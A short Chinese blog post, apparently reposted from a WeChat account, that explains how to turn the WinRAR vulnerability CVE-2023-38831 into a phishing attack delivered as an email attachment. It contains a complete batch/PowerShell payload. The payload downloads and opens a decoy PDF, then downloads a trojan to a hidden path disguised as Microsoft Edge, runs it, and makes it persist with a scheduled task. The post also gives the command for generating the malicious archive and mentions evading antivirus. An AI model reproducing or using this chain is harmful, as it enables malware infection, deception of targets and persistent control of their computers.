今天我们将使用CVE-2023-38831漏洞进行钓鱼:
这是一个经典的该漏洞弹出计算器的Demo,恶意的压缩包通过邮件附件的形式投递给攻击目标。压缩包利用WinRAR漏洞( CVE-2023-38831)执行位于压缩包中的cmd文件。
弹出计算器的是bat脚本,接下来我们将对其进行改进,弹出计算器改为弹出一个文档,并后台运行我们的木马,并持久化。
我们需要在bat中放几段拼接的powershell代码实现该功能:
作用是从指定地址下载与压缩包中相同的pdf诱饵文件,然后打开该诱饵以迷惑用户(蓝方)。下载exe木马文件到C盘隐蔽目录(直接放入之前做好的免杀三件套)并执行该文件,利用计划任务对免杀马持久化。
@echooffstart /min powershell -execbypass -w hidden -nop -c"invoke-webrequest -uri https://xxxxx/down.php/d56d71ecadf2137be09d8b1d35c6c042.txt -OUtfile 'readme.pdf'; invoke-expression '.readme.pdf'; invoke-WebRequest -Uri 'https://xxxxx/down.php/98dddd1a37325a2db2e2b1d371912b3b.txt' -OutFile "$env:LocalAppDataMicrosoftwindowsRingtonesMicrosoftEdge.exe"; invoke-expression "$env:LocalAppDataMicrosoftwindowsRingtonesMicrosoftEdge.exe"; schtasks /create /sc minute /mo 10 /tn 'Microsoft Edge' /tr "$env:LocalAppDataMicrosoftwindowsRingtonesMicrosoftEdge.exe" /f"
生成钓鱼压缩文件:
python cve-2023-38831-exp-gen.py readme.pdf script.bat cve-2023-38831-poc.rar运行后直接上线cobaltstrike:
遗留问题:代码没有混淆,运行会被x60阻止,使用powershell会被x60阻止,写入计划任务会被x60阻止。
完...
原文始发于微信公众号(kali linux渗透测试):【鱼饵】利用最新WinRAR漏洞钓鱼
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论